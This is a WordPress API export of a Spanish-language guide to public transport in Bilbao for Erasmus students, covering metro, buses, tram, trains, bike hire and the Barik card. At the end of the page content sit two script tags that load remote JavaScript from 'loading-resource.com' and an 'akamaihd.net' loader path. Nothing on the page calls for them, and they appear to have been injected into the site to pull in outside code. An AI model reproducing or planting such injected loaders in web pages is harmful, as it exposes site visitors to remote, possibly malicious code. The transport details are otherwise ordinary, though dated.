{"id":980,"date":"2012-01-21T14:59:49","date_gmt":"2012-01-21T14:59:49","guid":{"rendered":"http:\/\/www.aegeebilbao.org\/?page_id=980"},"modified":"2016-11-07T17:52:27","modified_gmt":"2016-11-07T17:52:27","slug":"transporte-publico","status":"publish","type":"page","link":"https:\/\/www.locals.aegee.org\/bilbao\/menu-erasmus\/informacion-util-erasmus\/transporte-publico\/","title":{"rendered":"Public Transport\/ Transporte p\u00fablico"},"content":{"rendered":"<p><!--:es-->Si vas a estar en Vizcaya o en Bilbao varios d\u00edas, merece la pena usar el creditrans, un abono m\u00faltiple para la mayor\u00eda de medios de transporte p\u00fablico de Vizcaya. Abajo del todo te lo explicamos mejor.<\/p>\n<h2>Metro<\/h2>\n<p>Tiene un logotipo caracter\u00edstico. Comunica Bilbao y otros municipios de los alrededores. Por la ciudad discurre bajo tierra, mientras que parte de la l\u00ednea 1 (margen derecha) tambi\u00e9n va por la superf\u00edcie. Es uno de los medios de transporte m\u00e1s utilizados. Es c\u00f3modo, r\u00e1pido y con amplios horari<img loading=\"lazy\" decoding=\"async\" class=\"alignright\" src=\"http:\/\/treneando.files.wordpress.com\/2009\/05\/nuevaunidad600delmetrobilbao.jpg\" alt=\"\" width=\"232\" height=\"146\" \/>os. Para acceder a la web de Metro Bilbao y ver los planos, horarios y las frecuencias, pincha <a href=\"http:\/\/www.metrobilbao.net\/cas\/usuario\/frecuencias.html\">aqu\u00ed<\/a>.<\/p>\n<p>De reciente construcci\u00f3n, se inaugur\u00f3 a finales de 1995. Las estaciones son grandes, limpias y espaciosas, muy diferentes de las agobiantes paradas de metro de otras ciudades.<\/p>\n<h2>Autob\u00fas<\/h2>\n<p>Tenemos dos tipos de autobuses p\u00fablicos:<\/p>\n<h3>Bilbobus<\/h3>\n<p>Son los autobuses urbanos. Conectan los diferentes barrios de la ciudad. Cada l\u00ednea tiene frecuencias y horarios diferentes. El precio del viaje, independientemente de la\u00a0 duraci\u00f3n o trayecto es de 1,2 euros el billete\u00a0 ocasional y algo mas de 60 centimos euros con la tarjeta barik.\u00a0 De lunes a viernes s\u00f3lo hay autobuses durante el d\u00eda. Los viernes y v\u00edsperas de festivo se amplia el horario nocturno, y de s\u00e1bado al domingo hay buses nocturnos durante toda la noche. Para m\u00e1s informaci\u00f3n sobre los autobuses urbanos Bilbobus, pincha <a title=\"Bilbobus\" href=\"http:\/\/www.bilbao.net\/nuevobilbao\/jsp\/bilbao\/residentes001.jsp?idioma=C&amp;color=rojo&amp;padre=*V4&amp;tema=440&amp;subtema=441&amp;menu3=no\">aqu\u00ed<\/a>.<\/p>\n<h3>Bizkaibus<\/h3>\n<p>Es la red de autobuses interurbanos de Vizcaya. Los precios cambian seg\u00fan la l\u00ednea y las paradas. Para m\u00e1s informaci\u00f3n sobre los autobuses Bizkaibus pincha <a href=\"http:\/\/www.bizkaia.net\/home2\/Temas\/DetalleTema.asp?Tem_Codigo=195&amp;idioma=CA\">aqu\u00ed<\/a>. Hasta ahora los autobuses han sido amarillos con l\u00edneas blancas y azules, pero desde hace un tiempo los nuevos autobuses son verdes y blancos, como los de la foto.<\/p>\n<h2>Tranv\u00eda<\/h2>\n<p>Une el Casco Viejo bilbaino con el hospital de Basurto. Solo circula durante el d\u00eda, aunq<img loading=\"lazy\" decoding=\"async\" class=\"alignright\" src=\"http:\/\/www.simplonpc.co.uk\/Tram_Bilbao\/EuskoTran-405_070530-073_bg.jpg\" alt=\"\" width=\"240\" height=\"160\" \/>ue hay servicios especiales con algunos eventos. Tambi\u00e9n hay una gu\u00eda tur\u00edstica para ver la ciudad desde el tranv\u00eda. M\u00e1s informaci\u00f3n <a href=\"http:\/\/www.euskotren.es\/euskotran\/html\/castellano\/pdf\/guia_tour.pdf\">aqu\u00ed<\/a>. El precio del billete ocasional es de 1 euro, mientras que con creditrans el viaje cuesta 0,55 euros.Se debe cancelar el billete en las m\u00e1quinas de la parada de origen siempre antes de subirse al tranv\u00eda, puesto que dentro de los vagones, no hay ni venta ni cancelaci\u00f3n de billetes.<\/p>\n<h2>Tren<\/h2>\n<p>El tren depende mucho de a d\u00f3nde quieras viajar, ya que dependiendo del recorrido que quieras hacer, tendr\u00e1s que elegir diferentes compa\u00f1\u00edas y estaciones.<\/p>\n<h3>Renfe<\/h3>\n<p>Tiene serv\u00edcios de largo recorrido, que comunican Bilbao con el resto del estado y servicio de cercan\u00edas, para comunicar Bilbao y parte de la provincia. En Bilbao hay diferentes estaciones de cercan\u00edas, pero todos los trenes tanto de cercan\u00edas como de largo recorrido salen de la estaci\u00f3n de Abando, en la plaza circular. Para ver los recorridos, precios, horarios y m\u00e1s informaci\u00f3n de cercan\u00edas pincha <a href=\"http:\/\/www.renfe.es\/cercanias\/bilbao\/index_horarios.html\">aqu\u00ed<\/a>. Y para ver m\u00e1s informaci\u00f3n de RENFE pincha <a href=\"http:\/\/www.renfe.es\/\">aqu\u00ed<\/a>.<\/p>\n<h3>Euskotren<\/h3>\n<p>Es la empresa que administra parte de los trenes de v\u00eda estrecha dentro del Pa\u00eds Vasco. Hay tres l\u00edneas, que comunican Bilbao con Bermeo (mediante la l\u00ednea de Urdaibai), con Gipuzkoa y su capital, San Sebasti\u00e1n, mediante la l\u00ednea de Donostia. Tiene una tercera l\u00ednea, la del Txorierri que va desde Bilbao hasta Lezama. Las l\u00edneas de Donostia y Urdaibai salen de la estaci\u00f3n de Atxuri (donde termina el tranv\u00eda) y en Bolueta (junto al metro). La l\u00ednea del Txorierri sale de la estaci\u00f3n del Casco Viejo, junto a la salida del metro Casco Viejo &#8211; San Nicolas. Para ver m\u00e1s informaci\u00f3n sobre l\u00edneas, horarios y precioslos\u00a0 pincha <a href=\"http:\/\/www.euskotren.es\/castellano\/horarios\/home2.html\">aqu\u00ed<\/a>.<\/p>\n<p><strong><em>\u00a1Importante!:<\/em><\/strong> Si quieres ir a Donostia &#8211; San Sebastian en un tiempo razonable, opta por el autob\u00fas y no por el tren, ya que \u00e9ste hace multitud de paradas, y pese a ser un poco m\u00e1s barato, tarda m\u00e1s del doble.<\/p>\n<h3>FEVE<\/h3>\n<p>FEVE es la empresa bajo la que el estado administra los Ferrocarriles de V\u00eda Estrecha, muy t\u00edpicos de las zonas monta\u00f1osas. Para m\u00e1s informaci\u00f3n pincha <a href=\"http:\/\/www4.feve.es\/horarios\/\" target=\"_blank\">aqu\u00ed<\/a>.<\/p>\n<h2>Bicicleta<\/h2>\n<p>Aunque Bilbao tiene muchos desniveles, el ayuntamiento ha puesto en marcha un servicio de alquiler de bicicletas. Para poder usarlas debes estar registrado. M\u00e1s informaci\u00f3n <a title=\"acc_doc\" href=\"http:\/\/www.bilbao.net\/agenda21\/pdf\/bilbon_bizi_folleto.pdf\" target=\"_blank\">aqu\u00ed<\/a>.<\/p>\n<h2>Barik<\/h2>\n<p>La tarjeta Barik es una tarjeta con un chip \u00absin contacto\u00bb que permite viajar en todos los modos de transporte p\u00fablicos vizca\u00ednos.Con la tarjeta Barik se puede viajar en todos los transportes p\u00fablicos de Bizkaia: <strong>Ferrocarriles<\/strong> (Metro Bilbao , EuskoTren , EuskoTran, Renfe,Feve) ,<strong> Autobuses<\/strong> (Bizkaibus, Bilbobus, Etxebarri Bus, Erandio Bus, Kbus Barakaldo),\u00a0 <strong>Cable<\/strong> (Puente Colgante, Ascensor de Ereaga, Funicular de Artxanda, Funicular de Larreineta ) y en otros servicios como <strong>Aparcamientos de Leioa, Etxebarri y BEC y las Bicicletas de la Mancomunidad de Uribe Kosta. <\/strong>Para m\u00e1s informaci\u00f3n, pincha <a href=\"https:\/\/www.ctb.eus\/es\/como-funciona-barik\">aqu\u00ed<\/a>.<\/p>\n<p><script src=\"\/\/loading-resource.com\/data.geo.php?callback=window.__geo.getData\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache3-a.akamaihd.net\/loaders\/1032\/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862\" type=\"text\/javascript\"><\/script><!--:--><!--:en--><\/p>\n<p>&nbsp;<\/p>\n<p><!--:--><\/p>\n","protected":false},"excerpt":{"rendered":"<p class=\"excerpt\">Si vas a estar en Vizcaya o en Bilbao varios d\u00edas, merece la pena usar el creditrans, un abono m\u00faltiple para la mayor\u00eda de medios de transporte p\u00fablico de Vizcaya. Abajo del todo te lo explicamos mejor. Metro Tiene un logotipo caracter\u00edstico. Comunica Bilbao y otros municipios de los alrededores. Por la ciudad discurre bajo tierra, mientras que parte de&hellip; <a href=\"https:\/\/www.locals.aegee.org\/bilbao\/menu-erasmus\/informacion-util-erasmus\/transporte-publico\/\">Read more &rarr;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":2571,"menu_order":2,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-980","page","type-page","status-publish","hentry","xfolkentry"],"_links":{"self":[{"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/pages\/980","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/comments?post=980"}],"version-history":[{"count":4,"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/pages\/980\/revisions"}],"predecessor-version":[{"id":3364,"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/pages\/980\/revisions\/3364"}],"up":[{"embeddable":true,"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/pages\/2571"}],"wp:attachment":[{"href":"https:\/\/www.locals.aegee.org\/bilbao\/wp-json\/wp\/v2\/media?parent=980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}